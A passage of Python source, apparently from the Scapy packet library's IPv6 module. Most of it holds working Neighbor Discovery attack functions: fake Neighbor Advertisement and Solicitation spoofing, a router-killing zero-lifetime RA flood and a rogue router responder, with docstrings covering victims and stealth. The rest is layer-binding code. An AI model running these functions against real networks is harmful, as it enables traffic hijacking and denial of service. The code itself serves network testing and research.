3717 """
3718 The main purpose of this function is to send fake Neighbor Advertisement
3719 messages to a victim. As the emission of unsolicited Neighbor Advertisement
3720 is pretty pointless (from an attacker standpoint) because it will not
3721 lead to a modification of a victim's neighbor cache, the function send
3722 advertisements in response to received NS (NS sent as part of the DAD,
3723 i.e. with an unspecified address as source, are not considered).
3725 By default, the fake NA sent to create the DoS uses:
3726 - as target address the target address found in received NS.
3727 - as IPv6 source address: the target address
3728 - as IPv6 destination address: the source IPv6 address of received NS
3729 message.
3730 - the mac address of the interface as source (or reply_mac, see below).
3731 - the source mac address of the received NS as destination macs address
3732 of the emitted NA.
3733 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
3734 filled with the mac address used as source of the NA.
3736 Following arguments can be used to change the behavior:
3738 iface: a specific interface (e.g. "eth0") of the system on which the
3739 DoS should be launched. If None is provided conf.iface is used.
3741 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3742 Only NS messages received from this source will trigger replies.
3743 This allows limiting the effects of the DoS to a single target by
3744 filtering on its mac address. The default value is None: the DoS
3745 is not limited to a specific mac address.
3747 tgt_filter: Same as previous but for a specific target IPv6 address for
3748 received NS. If the target address in the NS message (not the IPv6
3749 destination address) matches that address, then a fake reply will
3750 be sent, i.e. the emitter will be a target of the DoS.
3752 reply_mac: allow specifying a specific source mac address for the reply,
3753 i.e. to prevent the use of the mac address of the interface. This
3754 address will also be used in the Target Link-Layer Address option.
3756 router: by the default (False) the 'R' flag in the NA used for the reply
3757 is not set. If the parameter is set to True, the 'R' flag in the
3758 NA is set, advertising us as a router.
3760 Please, keep the following in mind when using the function: for obvious
3761 reasons (kernel space vs. Python speed), when the target of the address
3762 resolution is on the link, the sender of the NS receives 2 NA messages
3763 in a row, the valid one and our fake one. The second one will overwrite
3764 the information provided by the first one, i.e. the natural latency of
3765 Scapy helps here.
3767 In practice, on a common Ethernet link, the emission of the NA from the
3768 genuine target (kernel stack) usually occurs in the same millisecond as
3769 the receipt of the NS. The NA generated by Scapy6 will usually come after
3770 something 20+ ms. On a usual testbed for instance, this difference is
3771 sufficient to have the first data packet sent from the victim to the
3772 destination before it even receives our fake NA.
3773 """
3775 def is_request(req, mac_src_filter, tgt_filter):
3776 """
3777 Check if packet req is a request
3778 """
3780 # Those simple checks are based on Section 5.4.2 of RFC 4862
3781 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3782 return 0
3784 mac_src = req[Ether].src
3785 if mac_src_filter and mac_src != mac_src_filter:
3786 return 0
3788 # Source must NOT be the unspecified address
3789 if req[IPv6].src == "::":
3790 return 0
3792 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3793 if tgt_filter and tgt != tgt_filter:
3794 return 0
3796 dst = req[IPv6].dst
3797 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
3799 # If this is a real address resolution NS, then the destination
3800 # address of the packet is the link-local solicited node multicast
3801 # address associated with the target of the NS.
3802 # Otherwise, the NS is a NUD related one, i.e. the peer is
3803 # unicasting the NS to check the target is still alive (L2
3804 # information is still in its cache and it is verified)
3805 received_snma = inet_pton(socket.AF_INET6, dst)
3806 expected_snma = in6_getnsma(tgt)
3807 if received_snma != expected_snma:
3808 print("solicited node multicast @ does not match target @!")
3809 return 0
3811 return 1
3813 def reply_callback(req, reply_mac, router, iface):
3814 """
3815 Callback that reply to a NS with a spoofed NA
3816 """
3818 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
3819 # send it back.
3820 mac = req[Ether].src
3821 pkt = req[IPv6]
3822 src = pkt.src
3823 tgt = req[ICMPv6ND_NS].tgt
3824 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
3825 # Use the target field from the NS
3826 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
3828 # "If the solicitation IP Destination Address is not a multicast
3829 # address, the Target Link-Layer Address option MAY be omitted"
3830 # Given our purpose, we always include it.
3831 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3833 sendp(rep, iface=iface, verbose=0)
3835 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3837 if not iface:
3838 iface = conf.iface
3839 # To prevent sniffing our own traffic
3840 if not reply_mac:
3841 reply_mac = get_if_hwaddr(iface)
3842 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3844 router = 1 if router else 0 # Value of the R flags in NA
3846 sniff(store=0,
3847 filter=sniff_filter,
3848 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3849 prn=lambda x: reply_callback(x, reply_mac, router, iface),
3850 iface=iface)
3853def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3854 dst=None, src_mac=None, dst_mac=None, loop=True,
3855 inter=1, iface=None):
3856 """
3857 The main purpose of this function is to send fake Neighbor Solicitations
3858 messages to a victim, in order to either create a new entry in its neighbor
3859 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3860 that a node SHOULD create the entry or update an existing one (if it is not
3861 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501
3862 state is set to STALE.
3864 The two main parameters of the function are the source link-layer address
3865 (carried by the Source Link-Layer Address option in the NS) and the
3866 source address of the packet.
3868 Unlike some other NDP_Attack_* function, this one is not based on a
3869 stimulus/response model. When called, it sends the same NS packet in loop
3870 every second (the default)
3872 Following arguments can be used to change the format of the packets:
3874 src_lladdr: the MAC address used in the Source Link-Layer Address option
3875 included in the NS packet. This is the address that the peer should
3876 associate in its neighbor cache with the IPv6 source address of the
3877 packet. If None is provided, the mac address of the interface is
3878 used.
3880 src: the IPv6 address used as source of the packet. If None is provided,
3881 an address associated with the emitting interface will be used
3882 (based on the destination address of the packet).
3884 target: the target address of the NS packet. If no value is provided,
3885 a dummy address (2001:db8::1) is used. The value of the target
3886 has a direct impact on the destination address of the packet if it
3887 is not overridden. By default, the solicited-node multicast address
3888 associated with the target is used as destination address of the
3889 packet. Consider specifying a specific destination address if you
3890 intend to use a target address different than the one of the victim.
3892 dst: The destination address of the NS. By default, the solicited node
3893 multicast address associated with the target address (see previous
3894 parameter) is used if no specific value is provided. The victim
3895 is not expected to check the destination address of the packet,
3896 so using a multicast address like ff02::1 should work if you want
3897 the attack to target all hosts on the link. On the contrary, if
3898 you want to be more stealth, you should provide the target address
3899 for this parameter in order for the packet to be sent only to the
3900 victim.
3902 src_mac: the MAC address used as source of the packet. By default, this
3903 is the address of the interface. If you want to be more stealth,
3904 feel free to use something else. Note that this address is not the
3905 that the victim will use to populate its neighbor cache.
3907 dst_mac: The MAC address used as destination address of the packet. If
3908 the IPv6 destination address is multicast (all-nodes, solicited
3909 node, ...), it will be computed. If the destination address is
3910 unicast, a neighbor solicitation will be performed to get the
3911 associated address. If you want the attack to be stealth, you
3912 can provide the MAC address using this parameter.
3914 loop: By default, this parameter is True, indicating that NS packets
3915 will be sent in loop, separated by 'inter' seconds (see below).
3916 When set to False, a single packet is sent.
3918 inter: When loop parameter is True (the default), this parameter provides
3919 the interval in seconds used for sending NS packets.
3921 iface: to force the sending interface.
3922 """
3924 if not iface:
3925 iface = conf.iface
3927 # Use provided MAC address as source link-layer address option
3928 # or the MAC address of the interface if none is provided.
3929 if not src_lladdr:
3930 src_lladdr = get_if_hwaddr(iface)
3932 # Prepare packets parameters
3933 ether_params = {}
3934 if src_mac:
3935 ether_params["src"] = src_mac
3937 if dst_mac:
3938 ether_params["dst"] = dst_mac
3940 ipv6_params = {}
3941 if src:
3942 ipv6_params["src"] = src
3943 if dst:
3944 ipv6_params["dst"] = dst
3945 else:
3946 # Compute the solicited-node multicast address
3947 # associated with the target address.
3948 tmp = inet_ntop(socket.AF_INET6,
3949 in6_getnsma(inet_pton(socket.AF_INET6, target)))
3950 ipv6_params["dst"] = tmp
3952 pkt = Ether(**ether_params)
3953 pkt /= IPv6(**ipv6_params)
3954 pkt /= ICMPv6ND_NS(tgt=target)
3955 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3957 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3960def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
3961 ip_src_filter=None, reply_mac=None,
3962 tgt_mac=None):
3963 """
3964 The purpose of the function is to monitor incoming RA messages
3965 sent by default routers (RA with a non-zero Router Lifetime values)
3966 and invalidate them by immediately replying with fake RA messages
3967 advertising a zero Router Lifetime value.
3969 The result on receivers is that the router is immediately invalidated,
3970 i.e. the associated entry is discarded from the default router list
3971 and destination cache is updated to reflect the change.
3973 By default, the function considers all RA messages with a non-zero
3974 Router Lifetime value but provides configuration knobs to allow
3975 filtering RA sent by specific routers (Ethernet source address).
3976 With regard to emission, the multicast all-nodes address is used
3977 by default but a specific target can be used, in order for the DoS to
3978 apply only to a specific host.
3980 More precisely, following arguments can be used to change the behavior:
3982 iface: a specific interface (e.g. "eth0") of the system on which the
3983 DoS should be launched. If None is provided conf.iface is used.
3985 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3986 Only RA messages received from this source will trigger replies.
3987 If other default routers advertised their presence on the link,
3988 their clients will not be impacted by the attack. The default
3989 value is None: the DoS is not limited to a specific mac address.
3991 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
3992 on. Only RA messages received from this source address will trigger
3993 replies. If other default routers advertised their presence on the
3994 link, their clients will not be impacted by the attack. The default
3995 value is None: the DoS is not limited to a specific IPv6 source
3996 address.
3998 reply_mac: allow specifying a specific source mac address for the reply,
3999 i.e. to prevent the use of the mac address of the interface.
4001 tgt_mac: allow limiting the effect of the DoS to a specific host,
4002 by sending the "invalidating RA" only to its mac address.
4003 """
4005 def is_request(req, mac_src_filter, ip_src_filter):
4006 """
4007 Check if packet req is a request
4008 """
4010 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
4011 return 0
4013 mac_src = req[Ether].src
4014 if mac_src_filter and mac_src != mac_src_filter:
4015 return 0
4017 ip_src = req[IPv6].src
4018 if ip_src_filter and ip_src != ip_src_filter:
4019 return 0
4021 # Check if this is an advertisement for a Default Router
4022 # by looking at Router Lifetime value
4023 if req[ICMPv6ND_RA].routerlifetime == 0:
4024 return 0
4026 return 1
4028 def ra_reply_callback(req, reply_mac, tgt_mac, iface):
4029 """
4030 Callback that sends an RA with a 0 lifetime
4031 """
4033 # Let's build a reply and send it
4035 src = req[IPv6].src
4037 # Prepare packets parameters
4038 ether_params = {}
4039 if reply_mac:
4040 ether_params["src"] = reply_mac
4042 if tgt_mac:
4043 ether_params["dst"] = tgt_mac
4045 # Basis of fake RA (high pref, zero lifetime)
4046 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
4047 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
4049 # Add it a PIO from the request ...
4050 tmp = req
4051 while ICMPv6NDOptPrefixInfo in tmp:
4052 pio = tmp[ICMPv6NDOptPrefixInfo]
4053 tmp = pio.payload
4054 del pio.payload
4055 rep /= pio
4057 # ... and source link layer address option
4058 if ICMPv6NDOptSrcLLAddr in req:
4059 mac = req[ICMPv6NDOptSrcLLAddr].lladdr
4060 else:
4061 mac = req[Ether].src
4062 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
4064 sendp(rep, iface=iface, verbose=0)
4066 print("Fake RA sent with source address %s" % src)
4068 if not iface:
4069 iface = conf.iface
4070 # To prevent sniffing our own traffic
4071 if not reply_mac:
4072 reply_mac = get_if_hwaddr(iface)
4073 sniff_filter = "icmp6 and not ether src %s" % reply_mac
4075 sniff(store=0,
4076 filter=sniff_filter,
4077 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4078 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
4079 iface=iface)
4082def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
4083 ip_src_filter=None):
4084 """
4085 The purpose of this function is to send provided RA message at layer 2
4086 (i.e. providing a packet starting with IPv6 will not work) in response
4087 to received RS messages. In the end, the function is a simple wrapper
4088 around sendp() that monitor the link for RS messages.
4090 It is probably better explained with an example:
4092 >>> ra = Ether()/IPv6()/ICMPv6ND_RA()
4093 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
4094 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
4095 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
4096 >>> NDP_Attack_Fake_Router(ra, iface="eth0")
4097 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
4098 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
4099 ...
4101 Following arguments can be used to change the behavior:
4103 ra: the RA message to send in response to received RS message.
4105 iface: a specific interface (e.g. "eth0") of the system on which the
4106 DoS should be launched. If none is provided, conf.iface is
4107 used.
4109 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4110 Only RS messages received from this source will trigger a reply.
4111 Note that no changes to provided RA is done which imply that if
4112 you intend to target only the source of the RS using this option,
4113 you will have to set the Ethernet destination address to the same
4114 value in your RA.
4115 The default value for this parameter is None: no filtering on the
4116 source of RS is done.
4118 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4119 on. Only RS messages received from this source address will trigger
4120 replies. Same comment as for previous argument apply: if you use
4121 the option, you will probably want to set a specific Ethernet
4122 destination address in the RA.
4123 """
4125 def is_request(req, mac_src_filter, ip_src_filter):
4126 """
4127 Check if packet req is a request
4128 """
4130 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
4131 return 0
4133 mac_src = req[Ether].src
4134 if mac_src_filter and mac_src != mac_src_filter:
4135 return 0
4137 ip_src = req[IPv6].src
4138 if ip_src_filter and ip_src != ip_src_filter:
4139 return 0
4141 return 1
4143 def ra_reply_callback(req, iface):
4144 """
4145 Callback that sends an RA in reply to an RS
4146 """
4148 src = req[IPv6].src
4149 sendp(ra, iface=iface, verbose=0)
4150 print("Fake RA sent in response to RS from %s" % src)
4152 if not iface:
4153 iface = conf.iface
4154 sniff_filter = "icmp6"
4156 sniff(store=0,
4157 filter=sniff_filter,
4158 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4159 prn=lambda x: ra_reply_callback(x, iface),
4160 iface=iface)
4162#############################################################################
4163# Pre-load classes ##
4164#############################################################################
4167def _get_cls(name):
4168 return globals().get(name, Raw)
4171def _load_dict(d):
4172 for k, v in d.items():
4173 d[k] = _get_cls(v)
4176_load_dict(icmp6ndoptscls)
4177_load_dict(icmp6typescls)
4178_load_dict(ipv6nhcls)
4180#############################################################################
4181#############################################################################
4182# Layers binding #
4183#############################################################################
4184#############################################################################
4186conf.l3types.register(ETH_P_IPV6, IPv6)
4187conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
4188conf.l2types.register(31, IPv6)
4189conf.l2types.register(DLT_IPV6, IPv6)
4190conf.l2types.register(DLT_RAW, IPv46)
4191conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
4193bind_layers(Ether, IPv6, type=0x86dd)
4194bind_layers(CookedLinux, IPv6, proto=0x86dd)
4195bind_layers(GRE, IPv6, proto=0x86dd)
4196bind_layers(SNAP, IPv6, code=0x86dd)
4197# AF_INET6 values are platform-dependent. For a detailed explaination, read
4198# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501
4199if WINDOWS:
4200 bind_layers(Loopback, IPv6, type=0x18)
4201else:
4202 bind_layers(Loopback, IPv6, type=socket.AF_INET6)
4203bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
4204bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
4205bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
4206bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
4207bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
4208bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
4209bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
4210bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)